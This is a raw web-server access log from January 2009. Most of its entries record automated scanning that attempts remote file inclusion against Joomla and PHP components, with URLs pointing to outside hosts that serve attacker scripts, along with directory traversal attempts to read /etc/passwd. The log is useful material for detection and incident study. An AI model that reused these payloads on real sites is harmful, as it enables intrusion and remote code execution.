65.98.89.90 - - [30/Jan/2009:10:38:24 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:10:38:24 -0800] "GET /logs/access_080602.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:10:38:27 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:39:00 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:39:00 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:39:02 -0800] "GET /logs/access_080823.log/lostpasswd.php?env[include_prefix]=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:39:03 -0800] "GET /logs/access_080511.log/lostpasswd.php?env[include_prefix]=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:10:39:28 -0800] "GET /index.php?include=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 200 94817 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:39:30 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:39:30 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:39:35 -0800] "GET /logs/access_080129.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:40:08 -0800] "GET /logs/access_081223.log/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:40:23 -0800] "GET /logs/access_080823.log%20/lostpasswd.php?env[include_prefix]=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:40:29 -0800] "GET /logs/access_080810.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:41:13 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.82.66 - - [30/Jan/2009:10:41:33 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=&GLOBALS=&mosConfig_absolute_path=http://www.kimstroy.by//assets/images/_MD.TXT?? HTTP/1.1" 200 50 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.15.82.66 - - [30/Jan/2009:10:41:33 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=&GLOBALS=&mosConfig_absolute_path=http://www.kimstroy.by//assets/images/_MD.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:41:34 -0800] "GET /bikes/dteel/2008_01_27/Medium/ HTTP/1.0" 200 4809 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:41:40 -0800] "GET /logs/access_081220.log%20/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:41:47 -0800] "GET /logs/access_081013.log HTTP/1.0" 200 3995182 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:41:57 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:41:58 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95146 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:10:42:24 -0800] "GET /logs/access_081129.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:10:42:24 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:10:42:24 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:10:42:25 -0800] "GET /logs/access_080923.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:42:38 -0800] "GET /bikes/WeSTOC08/?M=A HTTP/1.0" 200 832 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:43:45 -0800] "GET /logs/access_080530.log/index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:43:45 -0800] "GET /logs/index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:43:46 -0800] "GET /index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 200 94843 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:43:49 -0800] "GET /logs/access_080718.log/index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:43:52 -0800] "GET /logs/access_081223.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:43:52 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:43:52 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:44:11 -0800] "GET /logs/access_081220.log%20/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [30/Jan/2009:10:44:47 -0800] "GET /logs/access_081201.log//snippets/reflect/snippet.reflect.php?reflect_base=http://xat.co.kr/seal/.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [30/Jan/2009:10:44:47 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://xat.co.kr/seal/.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [30/Jan/2009:10:44:47 -0800] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://xat.co.kr/seal/.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:44:58 -0800] "GET /logs/access_080526.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:44:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:44:59 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:45:16 -0800] "GET /logs/access_080718.log%20/index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:45:22 -0800] "GET /logs/access_080526.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:45:22 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:45:22 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:45:23 -0800] "GET /logs/access_080412.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:45:24 -0800] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:45:25 -0800] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 94600 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:45:26 -0800] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:45:29 -0800] "GET /logs/access_080831.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:45:41 -0800] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:10:45:50 -0800] "GET /logs/access_080530.log%20/index.php?sayfa=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:46:39 -0800] "GET /include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:46:39 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:46:39 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:46:48 -0800] "GET /logs/access_080904.log//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:46:56 -0800] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:46:56 -0800] "GET /logs/access_080412.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:46:57 -0800] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 94616 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:47:10 -0800] "GET /logs/access_080831.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.63.85.187 - - [30/Jan/2009:10:48:05 -0800] "GET /logs//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [30/Jan/2009:10:48:05 -0800] "GET /logs/access_081010.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [30/Jan/2009:10:48:05 -0800] "GET /vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [30/Jan/2009:10:48:20 -0800] "GET /logs/access_080127.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.6.78 - - [30/Jan/2009:10:48:36 -0800] "GET /errors.php?error=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
210.205.6.78 - - [30/Jan/2009:10:48:36 -0800] "GET /logs/errors.php?error=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:49:07 -0800] "GET /include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:49:07 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.58.238.85 - - [30/Jan/2009:10:49:07 -0800] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.58.238.85 - - [30/Jan/2009:10:49:07 -0800] "GET /logs/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.58.238.85 - - [30/Jan/2009:10:49:07 -0800] "GET /logs/access_081010.log/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:49:08 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.58.238.85 - - [30/Jan/2009:10:49:17 -0800] "GET /logs/access_080127.log/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:10:49:18 -0800] "GET /logs/access_080904.log//include/admin.lib.inc.php?site_path=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:49:19 -0800] "GET /logs/access_080831.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:49:19 -0800] "GET /logs/access_080412.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:49:19 -0800] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:49:19 -0800] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 94616 "-" "Mozilla/5.0" "www.dmulk.com"
195.56.77.54 - - [30/Jan/2009:10:49:50 -0800] "GET /vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.54 - - [30/Jan/2009:10:49:50 -0800] "GET /logs//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.54 - - [30/Jan/2009:10:49:51 -0800] "GET /logs/access_081010.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.54 - - [30/Jan/2009:10:50:02 -0800] "GET /logs/access_080127.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:07 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:07 -0800] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:19 -0800] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:19 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:19 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
209.126.254.81 - - [30/Jan/2009:10:50:22 -0800] "GET /vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.81 - - [30/Jan/2009:10:50:22 -0800] "GET /logs/access_081010.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.81 - - [30/Jan/2009:10:50:22 -0800] "GET /logs//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.81 - - [30/Jan/2009:10:50:30 -0800] "GET /logs/access_080127.log//vw_files.php?dPconfig[root_dir]=http://www.arbitrationadr.com/ftpquota?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:35 -0800] "GET /logs/access_081123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:35 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:35 -0800] "GET /logs/access_081012.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:35 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:36 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 200 95323 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:39 -0800] "GET /logs/access_081121.log/galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:39 -0800] "GET /logs/galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:39 -0800] "GET /logs/access_081213.log/galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:50:40 -0800] "GET /galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:10:50:44 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://eskipazartarim.gov.tr/uploads/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:51:10 -0800] "GET /logs/access_081017.log%20/head.php?adresa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:51:10 -0800] "GET /logs/head.php?adresa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:51:10 -0800] "GET /logs/access_080819.log%20/head.php?adresa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:51:10 -0800] "GET /head.php?adresa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:10:51:30 -0800] "GET /logs/access_081012.log/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:10:51:30 -0800] "GET /errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:10:51:31 -0800] "GET /logs/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.206.122.138 - - [30/Jan/2009:10:51:33 -0800] "GET /logs/access_081208.log//snippets/reflect/snippet.reflect.php?reflect_base=http://xat.co.kr/seal/.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:52:05 -0800] "GET /logs/access_081121.log/galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:52:05 -0800] "GET /logs/galeria.php?start=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
